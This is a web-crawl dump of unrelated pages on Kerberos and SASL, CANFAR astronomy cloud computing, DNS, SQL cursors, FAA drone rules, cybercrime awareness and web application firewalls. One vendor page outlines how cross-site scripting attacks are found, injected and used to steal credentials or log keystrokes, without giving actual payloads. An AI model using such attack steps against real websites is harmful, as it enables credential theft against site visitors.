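As a toy illustration of the trusted-third-party model: the KDC below shares a long-term secret with each principal and vouches for a fresh session key using an HMAC. Real Kerberos encrypts tickets and adds timestamps and nonces; this sketch, with invented names, only mimics the trust relationships:

```python
import hashlib
import hmac
import secrets

# The trusted third party (KDC) knows a shared secret for each principal.
KDC_KEYS = {"alice": secrets.token_bytes(16), "fileserver": secrets.token_bytes(16)}

def kdc_issue_ticket(client, service):
    """KDC mints a session key and a voucher the service can verify on its own."""
    session_key = secrets.token_bytes(16)
    blob = client.encode() + session_key
    ticket = hmac.new(KDC_KEYS[service], blob, hashlib.sha256).digest()
    return session_key, blob, ticket  # client forwards blob + ticket to the service

def service_accept(service, blob, ticket):
    # The service needs only its own long-term key to check the KDC's voucher;
    # it never has to contact the KDC or know the client's secret.
    expected = hmac.new(KDC_KEYS[service], blob, hashlib.sha256).digest()
    return hmac.compare_digest(expected, ticket)

session_key, blob, ticket = kdc_issue_ticket("alice", "fileserver")
print(service_accept("fileserver", blob, ticket))  # True
```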
Simple Authentication and Security Layer (SASL) provides an authentication abstraction layer to applications. It is a framework that authentication modules can be plugged into.
For more information, refer to RFC 2222.
Generic Security Services Application Program Interface (GSSAPI) provides authentication and other security services through a standard set of APIs. It supports different authentication mechanisms. Kerberos v5 is the most common.
For more information on the GSS APIs, refer to RFC 1964.
This SASL-GSSAPI implementation is from section 7.2 of RFC 2222. | <urn:uuid:2b2433d1-c152-4b41-b267-c69d03835396> | CC-MAIN-2017-04 | https://www.netiq.com/documentation/edir88/edir88/data/bs2zrb2.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.872331 | 171 | 2.859375 | 3 |
In nearly every research discipline, the number of scientific instruments adding to the stream of data input has been climbing. While this has spurred any number of software developments in recent years, without adequate hardware processing capabilities to handle the deluge, the possibilities that lie in the incoming data go unrealized.
Accordingly, a number of research institutions are finding new ways to handle the data deluge, both in terms of reinventing grid-based paradigms and looking to cloud computing models to extend already stretched computational resources.
Astronomy is one of several areas suffering from the glut of data brought about by more streamlined, complex, and numerous instruments, and not surprisingly, researchers are looking to grid and cloud models to handle the well of data.
Researchers Nicholas Ball and David Schade discussed the concept of astroinformatics in detail, stating that, “in the past two decades, astronomy has gone from being starved for data to being flooded by it. This onslaught has now reached the stage where the exploitation of these data has become a named discipline in its own right…This naming follows in analogy from the already established fields of bio- and geoinformatics, which contain their own journals and funding.”
Canada’s astronomy community is, like other nations with advanced astronomy research programs, looking for ways to approach their big data problem in an innovative way that combines elements of both grid and cloud computing. Their efforts could reshape current views of astroinformatics processing and help the country move toward its goals of becoming a global center for advancements in astronomical research.
The Canadian Advanced Network for Astronomical Research (CANFAR) is behind an ongoing project in conjunction with CANARIE (a national research network organization) to create a cloud-based platform to support astronomy research. The effort is being led by researchers at the University of Victoria in British Columbia in conjunction with the Canadian Astronomy Data Centre (CADC) and with participation from 11 other Canadian universities.
The goal of the project is to “leverage customized virtual compute and storage clouds, providing astronomers with access to many datasets and resources previously constrained by their local hardware environment.”
The CANFAR platform will take advantage of CANARIE’s high-speed network and a number of open source and proprietary cloud and grid computing tools to allow the country’s astronomy researchers to better handle the vast datasets that are being generated by global observatories. It will also be propelled by the storage and compute capabilities from Compute Canada in addition to the expertise from the Herzberg Institute of Astrophysics and the National Research Council of Canada.
CANFAR is driven forward by a number of objectives to support its mission to create a “global machine” that will help researchers further their astronomy goals. The creators of the project stated, “All of the necessary components exist to support science but they don’t work well together in that mission. The type of service layer that is needed to support a high level of integration of these components for astronomy does not exist and needs to be invented, installed, and operated.”
What CANFAR Can Do
The value proposition of CANFAR is that it will enable astronomers to process the data from astronomical surveys using a wide array of custom software packages and, of course, to widen the set of computational resources available for these purposes.
A report on the project described CANFAR as “an operational system for the delivery, processing, storage, analysis, and distribution of very large astronomical datasets” and as a project that pulls together a number of Canadian entities, including the Canadian National Research Network (CANARIE), Compute Canada’s extensive grid and storage capabilities, and the CADC data center to create a “unified storage and processing system.”
The report also describes the CANFAR project’s technical details, stating that it has “combined the best features of the grid and cloud processing models by providing a self-configuring virtual cluster deployed on multiple cloud clusters” that takes elements from grid-based services as well as a number of cloud services, including “Condor, Nimbus or OpenNebula, Eucalyptus or Amazon EC2, Xen, VOSpace, UWS, SSO, CDP and GMS.”
The researchers behind the CANFAR project noted that when considering different virtualization options, they considered both Xen and KVM, but settled on Xen because of its wider popularity at the time and because it was the only one that facility operators had used on an experimental basis in the past.
On the scheduler front, there were complexities because the CANFAR virtual cluster needed a batch job processing system that would provide the functionality of a grid cluster, thus making both Grid Engine and Condor natural options. The team settled on Condor, however, because upon examination of the environment, they found that using Grid Engine would mean that they would have to modify the cluster configuration anytime a VM was added or removed.
The team selected Nimbus as the “glue between cloud clusters” which “examined the workload in the Condor queue and used resources from multiple cloud clusters to create a virtual cluster suitable for the current workload” and used the Nimbus toolkit as the primary cloud technology behind the cloud scheduler.
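The cloud scheduler’s core behaviour, examining the workload and then growing or shrinking the virtual cluster to match, can be sketched as follows. This is a deliberate simplification: the real system inspects Condor queue state and drives Nimbus/EC2-style APIs rather than a pure function:

```python
def reconcile(queued_jobs, running_vms, slots_per_vm=1, max_vms=20):
    """Decide how many worker VMs to boot or terminate for the current queue depth."""
    needed = min(max_vms, -(-queued_jobs // slots_per_vm))  # ceiling division
    if needed > running_vms:
        return ("boot", needed - running_vms)
    if needed < running_vms:
        return ("terminate", running_vms - needed)
    return ("steady", 0)

print(reconcile(queued_jobs=10, running_vms=3))  # ('boot', 7)
print(reconcile(queued_jobs=0, running_vms=3))   # ('terminate', 3)
```

The design point is that the batch system (Condor) stays the source of truth for work, while the scheduler treats VMs as disposable capacity to be reconciled against it.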
The team also developed support for OpenNebula, Eucalyptus and EC2, but decided on Nimbus because it was open source and permitted the “cloud workload to be intermixed with conventional batch jobs unlike other systems.” The research team behind CANFAR stated that they believed “that this flexibility makes the deployment more attractive to facility operators.”
With Linux as the operating system and an emphasis on interoperability and open source, CANFAR will be a proving ground for the use of these scheduling and cloud-based management tools on large datasets. In addition to other projects that make use of similar (although diverse in terms of packages used) interoperability and open source paradigms like NASA’s Nebula cloud, there will likely be a number of exciting proof of concept reports that will emerge over the course of the next year.
CANARIE’s vision for the project is that it will also “provide astronomers with novel and more immediate hands-on and interactive ways to process and share very large amounts of data emerging from space exploration.”
In addition to helping research better manage the incredible amounts of data filtering in from collection sites, the project’s goals are also tied to aiding collaboration opportunities among geographically dispersed scientists.
As the CANFAR team noted, “a schematic of contemporary astronomy research shows that the system is essentially a networked global array of infrastructure with scientists and telescopes as I/O devices.”
Slides describing some of the current research challenges and potential benefits as well as some of the context for the project can be found here. | <urn:uuid:aee521a7-1381-45ba-9580-cb98185e7117> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/01/17/canada_explores_new_frontiers_in_astroinformatics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00404-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942952 | 1,439 | 2.875 | 3 |
Every medium has its pros and cons when it comes to conveying a message. One of the most used communication methods today, e-mail, has almost replaced face-to-face communication – even for people in the same office.
E-mail certainly has a place in business communications, but it sure isn’t perfect, especially when it comes to understanding a person’s tone of voice, which is critical in forging personal connections. Ever get an e-mail from your manager or an employee and wonder what emotion the sender was feeling? How often do multiple messages get exchanged until understanding is achieved? It happens all the time!
A phenomenon that has exploded with the growth of social media and texting is the emoji, a small, digital icon used to display an idea or emotion. Emojis typically are derived from a smiley face, for good reason. Human beings recognize emotions in facial expressions. Before emojis became popular, there were emoticons, which use punctuation marks rather than icons, but the idea is the same: they provide a way to signal emotions. ; ) For a lot of people sending texts and e-mail, the icons are added on a reflexive impulse, to emphasize the intended emotion of the message. That’s a pretty good sign that the words alone aren’t enough.
Why aren’t words enough? Because the tone of your words matters. When you communicate with somebody who has difficulty understanding your tone of voice, the message itself tends to get lost or misinterpreted. To reach and engage an audience, whether it’s one person or 10,000, messages need to be clear and create an emotional connection.
Tim Sanders, former chief solutions officer and leadership coach at Yahoo and now a strategy consultant, offers great advice on what to do when e-mail falls short of delivering the intended message: pick up the phone and talk to whomever you’re trying to reach. What a novel idea! Let your audience hear your voice and clear up any misconceptions. But one thing you can’t convey on a phone call is body language. So there is still room for miscommunication, even when people are listening to what you’re saying.
What method of communication is personal and conveys emotion directly and unambiguously? It’s face to face. This can be delivered in person, but it is equally effective when communicating via video. When you can see and hear the person speaking, and observe his or her facial expressions and body language, you have a very clear idea of that person’s intended message.
For enterprises with large, distributed audiences – they can be employees, customers, business partners or others – the most cost-effective way to communicate clearly, the first time and every time, is through live or on-demand video.
I’ve written before about the power of authenticity in communication, and it’s been proven time and again with clients of my company, INXPO, that live video is the most authentic form of mass communication, next to being there in person.
To learn more about the power of live events powered by video, visit www.inxpo.com. | <urn:uuid:3f791fd2-c954-44bb-966f-681c0e437a19> | CC-MAIN-2017-04 | https://blog.inxpo.com/why-emotion-matters-in-messaging/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00159-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.944174 | 656 | 2.640625 | 3 |
Cross-site scripting has been at the top of both the OWASP Top Ten list and the CWE/SANS Top 25 repeatedly. Some reports show cross-site scripting, or XSS, vulnerabilities to be present in 7 out of 10 web sites while others report that up to 90 percent of all web sites are vulnerable to this type of attack. Why are so many sites at risk? Because cross-site scripting attacks are so easy to perform.
Basically, an attacker injects a malicious script into a web site. This can be in a forum, comment section, or any other input area. When victims visit that web site, the injected script can run in their browsers; often simply loading the page is enough to start the exploit.
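The standard defence against this kind of injection is output encoding: escape any user-supplied text before writing it into a page. A minimal Python sketch, with an invented payload for illustration:

```python
import html

user_comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Rendering the raw string would execute in a victim's browser (stored XSS).
unsafe = "<div class='comment'>" + user_comment + "</div>"

# Escaping turns markup characters into harmless entities before output.
safe = "<div class='comment'>" + html.escape(user_comment) + "</div>"

print("<script>" in safe)  # False: the payload is now inert text
```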
A few facts about cross-site scripting attacks that you should be aware of are:
Attackers are lured to XSS exploits because of how easy they are to perform, but they also know to follow the money. Attacking a web site through a cross-site scripting vulnerability can be quite profitable for the attacker who knows how to harness this type of exploit.
Without proactive Web application security in place to stop XSS attacks, you leave your site vulnerable to:
Web sites that have been exploited using XSS attacks have also been used to:
With dotDefender web application firewall you can avoid XSS attacks because dotDefender inspects your HTTP traffic and determines if your web site suffers from cross-site scripting vulnerabilities or other attacks to stop web applications from being exploited.
Architected as plug & play software, dotDefender provides optimal out-of-the-box protection against cross-site scripting, SQL Injection attacks, path traversal and many other web attack techniques.
The reasons dotDefender offers such a comprehensive solution to your web application security needs are:
Before a web site can be compromised, an attacker needs to find applications that are vulnerable to XSS vulnerabilities. Unfortunately, most web applications, both Free/Open Source Software and commercial software, are susceptible. Attackers simply perform a Google search for terms that are often found in the software. Using search bots to automate this process means an attacker can find thousands of vulnerable web sites in minutes.
Once a vulnerable web site is discovered, the attacker then examines the HTML to find where the exploit code can be injected.
After this has been determined, the attacker then begins to code the exploit. There are three types of XSS attack that can be used: persistent (stored), non-persistent (reflected), and DOM-based.
After the code has been written, it is then injected into the target site.
Now that the script has been injected into the vulnerable site, the attacker can now begin to reap the rewards. If the intent of the XSS attack was to steal user authentication credentials, usernames and passwords are now collected. For attacks that center around keystroke logging, the attacker will begin to receive the logged results from the victims. If the intent was to inject spam links into a well trusted site, then the attacker will begin to see increased activity on their sites due to higher traffic and higher search engine results.
If the attack was successful, the attacker will often replicate it on other sites to increase the potential reward.
Cross-site scripting not only costs businesses in stolen data, but also harms their reputation. Owners who work hard to establish a trusted site for delivering content, services, or products often find themselves hurt when loyal visitors lose trust in them after an attack. Visitors whose data is stolen, or who find their computers infected as the result of an innocent visit to your web site, are hesitant to return even if assurances are made that the site is now clean.
Even if a vulnerable site is fixed, sites that contained malicious code from an XSS exploit are usually flagged by Google and other search engines as a result. The time and effort spent restoring a solid reputation with the search engines is an added cost that most web site owners never figure on.
The threat posed by cross-site scripting attacks is not solitary. Combined with other vulnerabilities like SQL injections, path traversal, denial of service attacks, and buffer overflows the need for web site owners and administrators to be vigilant is not only important but overwhelming.
dotDefender's unique security approach eliminates the need to learn the specific threats that exist on each web application. The software that runs dotDefender focuses on analyzing the request and the impact it has on the application. Effective web application security is based on three powerful web application security engines: Pattern Recognition, Session Protection and Signature Knowledgebase.
The Pattern Recognition web application security engine employed by dotDefender effectively protects against malicious behavior such as SQL Injection and Cross Site Scripting. The patterns are regular expression-based and designed to efficiently and accurately identify a wide array of application-level attack methods. As a result, dotDefender is characterized by an extremely low false positive rate.
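A regular-expression pattern-recognition engine of the kind described can be shown in miniature. The two rules below are deliberately simplistic illustrations, nothing like a production signature set:

```python
import re

# Toy request filter: each rule pairs an attack name with a regex pattern.
RULES = [
    ("xss", re.compile(r"<\s*script", re.IGNORECASE)),
    ("sql injection", re.compile(r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+", re.IGNORECASE)),
]

def inspect(request_param):
    """Return the names of all rules that match the given request parameter."""
    return [name for name, pattern in RULES if pattern.search(request_param)]

print(inspect("query=<script>alert(1)</script>"))  # ['xss']
print(inspect("user=admin' OR '1'='1"))            # ['sql injection']
print(inspect("user=alice"))                       # []
```

A real engine needs far broader patterns plus decoding of URL/HTML encodings, which is exactly where naive regex filters get bypassed and why tuning against false positives matters.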
What sets dotDefender apart is that it offers comprehensive protection against cross-site scripting and other attacks while being one of the easiest solutions to use.
In just 10 clicks, a web administrator with no security training can have dotDefender up and running. Its predefined rule set offers out-of-the box protection that can be easily managed through a browser-based interface with virtually no impact on your server or web site’s performance. | <urn:uuid:58779578-27dc-4473-82a9-b75ce69e7b39> | CC-MAIN-2017-04 | http://www.applicure.com/solutions/prevent-cross-site-scripting-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279224.13/warc/CC-MAIN-20170116095119-00003-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940567 | 1,073 | 2.8125 | 3 |
SQL declares a cursor implicitly for all SQL data manipulation statements, including queries that return only one row. However, for queries that return more than one row you must declare an explicit cursor or use a cursor FOR loop.
An explicit cursor is a cursor whose name is explicitly assigned to a SELECT statement via the CURSOR...IS statement, and which the program controls through DECLARE, OPEN, FETCH and CLOSE. Explicit cursors are used to process multirow SELECT statements; an implicit cursor is used to process INSERT, UPDATE, DELETE and single-row SELECT...INTO statements.
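The explicit-cursor pattern (declare, open, fetch in a loop, close) looks much the same in any database API. Here is that shape sketched with Python's sqlite3 module standing in for PL/SQL, with an invented table for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (name TEXT, dept TEXT)")
conn.executemany("INSERT INTO emp VALUES (?, ?)",
                 [("Ann", "IT"), ("Bob", "IT"), ("Cid", "HR")])

# Explicit-cursor pattern: open the cursor, fetch rows one at a time in a
# loop, then close -- the shape PL/SQL uses for multirow SELECT statements.
cur = conn.cursor()                                          # declare + open
cur.execute("SELECT name FROM emp WHERE dept = ? ORDER BY name", ("IT",))
names = []
while True:
    row = cur.fetchone()                                     # fetch
    if row is None:
        break
    names.append(row[0])
cur.close()                                                  # close
print(names)  # ['Ann', 'Bob']
```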
Generally, DNS stands for Domain Name System, though it is sometimes read as Domain Name Service. Either way, DNS is a multi-level distributed naming system for computers, services, and any other resources connected to the internet or to a private network. Its main purpose is to tie domain names to the relevant information about the online entities they are allotted to. Most importantly, it gives a meaningful form to the names that identify networking equipment located in different corners of the world. In practice, DNS provides the function of a database service; the term also covers the DNS protocol, the detailed specification of the data structures and communication exchanges used in DNS as part of the IP suite.
But as an internet service, the key job of DNS is to translate the domain names of communicating devices into their IP addresses. With this system, it is possible to allocate domain names to different groups of online resources and users, independent of the devices' physical locations. The point of doing so is simply the convenience of human-readable device names on the internet: domain names are alphabetic, so one can easily understand and remember them, while IP addresses are assigned to connected devices in numerical form, such as 22.214.171.124.
Whenever you visit a website, you are using a domain name. It is the Domain Name System that translates that domain name into its corresponding Internet Protocol (IP) address.
Certain advantages are associated with the DNS service like:
- no host table management is required
- especially designed for the internet; the internet's existence would be impossible without the DNS system
The Domain Name System provides a hierarchical structure, both for delegating naming authority and for maintaining the naming structure within DNS. At the uppermost level of that hierarchy is the root domain “.”, which is under the control of IANA (the Internet Assigned Numbers Authority). IANA holds administrative authority over the root domain so that domains beneath the root can be allocated.
The process of handing over a domain to an organizational body is known as delegation; it also covers the creation of sub-domains by that domain's administrator. Hierarchical delegation begins at the DNS “root”, and a fully qualified domain name is obtained by tracing the DNS hierarchy and separating each simple name with a “.”. For example: oma.xyz.edu.au
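That hierarchical walk from the root down through each label can be sketched with a toy in-memory tree; the zone data below is invented for illustration:

```python
# Toy DNS tree: each level delegates to the next; leaves hold addresses.
ROOT = {
    "au": {"edu": {"xyz": {"oma": "192.0.2.10"}}},
}

def resolve(fqdn):
    """Walk the hierarchy from the root: 'oma.xyz.edu.au' -> au -> edu -> xyz -> oma."""
    node = ROOT
    for label in reversed(fqdn.rstrip(".").split(".")):
        node = node[label]
    return node

print(resolve("oma.xyz.edu.au"))  # 192.0.2.10
```

Real resolution distributes this walk across many name servers, with each level referring the resolver to the servers authoritative for the next label down.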
DNS is maintained as a distributed database that follows a client/server approach; the nodes of this database are known as name servers. The “authoritative name server” mechanism is what makes DNS both distributed and fault-tolerant. Every domain should have at least one authoritative DNS server that can distribute information about the domain, as well as about the name servers of any domains delegated beneath it. An authoritative name server is a name server with the authority to provide definitive answers, as configured by the administrator. There are two types of authoritative name server:
- master server, which holds the original copies of the zone records
- slave server, which holds copies of the zone records obtained from the master
Domain names are registered with the help of a domain name registrar. A primary name server is required when installing a domain name at the top-level domain registry, and in any case at least one secondary name server is also needed. The primary name server is called the master name server, and the secondary name server works as a slave server.
December is Identity Theft Prevention and Awareness month. Amidst all the bells-a-ringing and people singing that also come around this time of year, it can be easy to ignore the more sober reality of this important topic.
Are You Aware?
A great place to start on the “awareness” side of all this is with Norton Security’s 2011 cybercrime report: a sleek, user-friendly chart with surveys, maps, and even animations breaking down everything you need to know about the current state of cybercrime in the U.S. Some of the statistics are pretty grim, but eye-opening. Here are some numbers you really need to see:
- Last year, in 24 countries, 14 people suffered from cybercrime every second
- Altogether cybercrime cost victims (in those same countries) $113,882,054,117
- The odds that an online adult will become a victim of cybercrime this year are almost 1 in 2
- 10% of all online adults have experienced cybercrime on their mobile phones
Are You Protected?
So what can you do to protect yourself from cybercrime? That’s where the “prevention” part comes in, and there are steps you can take. Your online identity is the sum total of your vulnerable personal information, including credit card numbers, social security number, usernames, email addresses and passwords. This data can and must be protected.
A secure password manager like Keeper is essential to make sure your passwords are strong and encrypted, and to ensure that private data stays exactly that: private. Keeper for your computer, your smartphone, or your tablet is the solution to the scary threat of cyber attacks. | <urn:uuid:8340930f-ed81-4dbc-86eb-9ba375b63345> | CC-MAIN-2017-04 | https://blog.keepersecurity.com/2012/12/20/the-truth-about-cybercrime-today/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00571-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935172 | 350 | 2.578125 | 3 |
A new Google Chrome experiment virtually reproduces 100,000 nearby stars in just one tab in your web browser. The term "nearby" in this context being relative, of course.
The visualization can be accessed here, and it's a really effective gateway to procrastination. You can zoom in past Barnard's Star or Alpha Cassiopeiae on your way to the Sun. Or you can click the discreet "take a tour" icon in the top right corner of the screen for an educational presentation that begins with the Sun and then pans out, putting everything in perspective, such as the actual distance of Voyager 1 from Earth or the proximity of other stars to the Sun. And it's all done with some eerie music playing in the background, of course.
Google credits Wikipedia for the star renderings and for images of the galaxy, along with several observatories. Images of the Sun were provided by NASA and several other science teams, while researchers and agencies from across the world chipped in data on the stars. Oh, and if you recognize the music, then you must have played Mass Effect; Google tapped Sam Hulick, who scored the video game, for the accompanying soundtrack, which, while perfectly ominous for the scene it accompanies, can get to be a little much for those who keep the tab open for too long while trying to write a blog post about it.
As I mentioned, it's a great, almost literal escape for the middle of the workday. But for those who would nitpick the project for accuracy, Google was one step ahead with a disclaimer:
Warning: Scientific accuracy is not guaranteed. Please do not use this visualization for interstellar navigation. | <urn:uuid:c43c2615-5c61-4996-948b-908599dfea3c> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2223504/opensource-subnet/google-reproduces-100-000-stars-in-chrome-experiment.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939937 | 344 | 2.921875 | 3 |
The Federal Aviation Administration (FAA) and the White House proposed guidelines last week on unmanned aircraft, finally responding to industry pressure to ease restrictions on remotely piloted aircraft.
The FAA’s proposal allows private use of drones weighing 55 pounds or less, flying at altitudes up to 500 feet and speeds less than 100 miles per hour. For the sake of comparison, the Washington Monument is about 550 feet tall, and a Cessna private propeller plane cruises at about 120 mph. The FAA’s rules would bar drones from flying near airports or at night.
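Since the proposed limits are simple numeric thresholds, a hypothetical pre-flight check is easy to sketch. The weight, altitude, and speed numbers below come from the proposal itself; the function and its structure are purely illustrative:

```python
# Illustrative sketch of the FAA's proposed numeric limits for small drones.
# The three thresholds come from the proposal; everything else is hypothetical.
MAX_WEIGHT_LBS = 55
MAX_ALTITUDE_FT = 500
MAX_SPEED_MPH = 100

def violates_proposed_rules(weight_lbs, altitude_ft, speed_mph):
    """Return a list of human-readable rule violations (empty if none)."""
    violations = []
    if weight_lbs > MAX_WEIGHT_LBS:
        violations.append("drone exceeds 55 lb weight limit")
    if altitude_ft > MAX_ALTITUDE_FT:
        violations.append("flight exceeds 500 ft altitude ceiling")
    if speed_mph > MAX_SPEED_MPH:
        violations.append("flight exceeds 100 mph speed limit")
    return violations

# A 4 lb quadcopter at 400 ft and 35 mph passes all three checks:
print(violates_proposed_rules(4, 400, 35))    # → []
print(violates_proposed_rules(60, 600, 120))  # three violations
```

Note that the airport and night-flying restrictions are categorical rather than numeric, so they would need separate handling in any real rule check.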
Those new rules affect a host of industries and, potentially, government agencies. Here are six things to know about the proposal:
1. Hold that delivery.
The FAA effectively grounded plans for companies such as Amazon by requiring that pilots be certified and that they operate their drones within their own field of vision. Amazon’s plans for drone-home delivery won’t fly if that rule survives the review process.
Department of Transportation Secretary Anthony Foxx said at Washington, D.C.’s Union Station that the government is not closing the doors on delivery, just trying to ensure safety. “I actually would be happy to have our team engage with not only Amazon, but other users who may feel like there’s more that should be done and in fact our rule making process allows for public comment.”
2. Limitless possibilities.
The White House drone memorandum sees potential uses for unmanned aircraft in agriculture, law enforcement, coastal security, military training, search and rescue, first responder medical support, and more. Civilian uses, including recreation, movie making, real estate sales and development, and news coverage, are just a few other areas where unmanned aircraft could prove useful.
The memo notes concerns about drone use and protecting civil liberties, but privacy advocates howled over vague verbiage such as requiring that gathering information with drones can only be done for an “authorized purpose.”
3. Public notice required.
Government agencies employing drones will have to provide a “notice to the public” where drones operate and release an annual summary of the types of missions they’re conducting.
Within those guidelines, individual agencies will have authority to implement rules for their own use.
The directive requires Feds to disclose when and where they fly. Taxpayer-funded drones will have to reveal what they do with any data collected during aerial surveillance and the FAA retains the right to inspect a drone or revoke an operator’s certification at any time.
“We want to capture the potential of unmanned aircraft and we have been working to develop the framework for the safe integration of this technology into our airspace,” Department of Transportation Secretary Anthony Foxx told NPR.
4. Warm Reception – So Far
Brian Wynne, president of the Association for Unmanned Vehicle Systems International (AUVSI), called the FAA’s proposal a “good first step in an evolutionary process.”
“This technology holds tremendous promise for many commercial applications in the areas of science, safety, and security, including everything from aerial surveying to precision agriculture,” Sen. Maria Cantwell (D-Wash.), who is the top ranking Democrat on the Senate Subcommittee on Aviation Operations, Safety and Security, said in a statement. “I look forward to working with the FAA and my colleagues to develop a framework that balances economic potential with protecting privacy and the safety of our national airspace system.”
But Sen. Charles Schumer (D-NY) called for more business-friendly regulations. “These FAA rules are a solid first step but need a lot more refining. The inclusion of the rule that drones must be flown within the operator’s line of sight appears to be a concerning limitation on commercial usage; I urge the FAA to modify that as these rules are finalized,” Schumer said, according to USA Today.
5. Privacy Concerns
The American Civil Liberties Union (ACLU) expressed concern over the expanded use of drones domestically, despite the FAA’s efforts to address privacy issues.
“This proposal…falls short of fully protecting the privacy of Americans,” ACLU Legislative Counsel Neema Singh Guliani said in a statement.
6. Thousands of Users
Soon, you can expect to see drones flying over construction sites, inspecting cell towers, and checking for forest fires, Ben Popper writes at The Verge. The FAA estimates that with these new rules in place, more than 7,000 companies will be able to fly drones in the first three years.
Agencies will need time to understand and explore all the ways drones might be used and what the implications could be on the public, both in terms of safety and privacy.
Congress and the public will also have a say, and it could take years before the policies are in place and enforced. American citizens should reap the most benefits as they enjoy better technology to improve our country’s infrastructure – but will new regulations quell fears of Orwellian surveillance in the sky?
Cloud computing was not designed for security, although organizations such as Cloud Security Alliance (CSA) and Open Web Application Security Project (OWASP) are making great strides in helping the industry solve the myriad security problems confronting cloud computing. The benchmark guidelines established by the CSA in the document, Guidance for Critical Areas of Focus in Cloud Computing, is a great first step. This article is intended to pick up where the CSA guide left off in terms of defining what a distributed web application firewall (dWAF) should look like in order to meet the standards set within the CSA document.
In order to accurately outline how a dWAF is possible while maintaining all the benefits of a completely virtualized environment – reduced IT overhead, flexible footprint management, virtually unlimited scalability – a brief overview of cloud technology is needed. Far more than simply maximizing current hardware resources to benefit from unused CPU power, today there are three main technologies available in a cloud that provide the backbone for real productivity gains and compelling business services for companies that don’t want to invest in the hardware scaling burdens common today.
Software as a service (SaaS) offers users virtualized software through a thin-client, usually any standard web browser. The benefit for users is access to software without any of the headaches of owning the programs: scaling and resources are taken care of, and patching and upgrades are managed.
Platform as a service (PaaS) provides users with virtual databases, storage and programming languages with which custom applications can be built. This service provides nearly unlimited resources behind the platform and allows customers to scale throughout the lifetime of the application. It is an effective solution for companies ranging from the very small to those serving millions of customers. The customer does not worry about the infrastructure needed to run the services and is billed in per usage model.
Infrastructure as a service (IaaS) allows users access to virtually unlimited resources to build and manage their own virtual network. Customers can commission and decommission virtual resources depending on their need. The most obvious benefit is that hardware end-of-life is no longer the customer's problem: providers migrate customers' virtual resources from hardware to hardware, according to their service level, without any downtime.
The common user benefit of services available through a cloud is access to key resources via the Internet, which provides an incredible degree of scaling without the need to invest in expensive hardware infrastructure.
Cloud applications are highly exposed to threats
Accessing cloud technologies requires a thin-client, and the world’s most commonly used thin-client for this purpose is a web browser. This means the vast majority of all applications on the Internet have some kind of web and / or application server on which the business logic is implemented. Currently, most of the money spent on security goes into firewalls and antivirus solutions, but over the last 10 years the typical target for attacks has shifted from the network layer to the application layer, because operating systems and the services exposed to the general public have been progressively locked down. As a result, it is now easier to target the application logic or framework of an application than the actual server behind the hardened network perimeter. Applications are mostly developed by the businesses themselves, and not every developer considers security the highest priority, which leads to a wide variety of problems.
The IBM X-Force 2008 Annual Report highlights that web application vulnerabilities are the Achilles’ Heel for corporate IT security. The impact of not being able to secure these vulnerabilities is far reaching.
Further, attack vectors increase exponentially with the mainstream adoption of cloud computing, driven by the hosting and delivery of infrastructure, platforms and software. Establishing a comprehensive patch management system is the common solution offered by most in the industry; in practice, however, this approach has proved very difficult and costly. Typical web applications are built from open source components, by third parties, on top of web frameworks. This approach has the obvious benefits of interoperability and shortened development time, but patching becomes exponentially more difficult: a flaw in one piece of open source code must be patched separately in every application that uses it. In a cloud setting, this becomes a very large issue.
Applications developed specifically for a cloud are often very complex, designed for access speed, scalability and flexibility for third-party development through an open API; Salesforce.com, Google Docs, MySpace, Facebook and Twitter are all prime examples. These "as a service" applications come about in two ways today: by moving on-premise applications to a cloud, and by developing and operating applications directly in a cloud.
Applications that are forced out of the internal company network and into a cloud run the risk of exposing previously protected software to web threats it was not designed to combat. Common security threats include injection attacks, cross-site scripting and cross-site request forgery.
There are a variety of services available for developing in a cloud, such as MS Azure Services, Google App Engine or Amazon EC2, and many security challenges are involved in developing web applications there. For example, parameter validation, session management and access control are ‘hotspots’ for attackers. Developers not trained in these three areas will almost certainly build applications with security problems.
Why a traditional Web application firewall will not work
In a cloud, the infrastructure and the services are shared between customers, meaning one set of hardware is used by many businesses, organizations and even individuals. Each of these cloud operator customers adds a unique layer of policy settings, use-cases and administrative enforcement requirements. For the cloud or service provider, security quickly becomes very complex: the average provider may have 10,000 customers subscribing to its service, each with varied policy settings for individual divisions within the company, leaving the provider to manage a combinatorial explosion of application filter settings.
Currently, web application firewalls (WAF) and other security solutions are restricted to hardware appliances, which creates a serious bottleneck for cloud service providers. Dedicated hardware boxes simply don’t allow for reasonably scalable levels of multiple administrators duties within a box’s singular security policy mechanism. Ironically, in addition to the traditional network hardware, cloud service providers are forced to have a rack full of dedicated WAF machines – one per customer – that take up space and eat up resources. Security becomes counter to the efficiency promises of a fully virtualized environment. This cost is passed on to customers, increasing adoption barriers to mainstream cloud computing.
In an ideal world, applications would be designed from the ground up to meet the rigors of a virtualized world, integrating security measures directly into the applications and thus solving a core problem with current cloud computing. Until the industry reaches this ideal, traditional web application firewall boxes are preventing the industry from reaching the full potential of cloud computing.
Defining the distributed Web application firewall (dWAF) for cloud protection
Web application security in a cloud has to be scalable, flexible, virtual and easy to manage. A WAF must escape hardware limitations and be able to dynamically scale across CPU, computer, server rack and datacenter boundaries, customized to the demands of individual customers. Resource consumption of this new distributed WAF must be minimal and remain tied to detection / prevention use instances rather than consuming increasingly high levels of CPU resources. Clouds come in all sizes and shapes, so WAFs must as well.
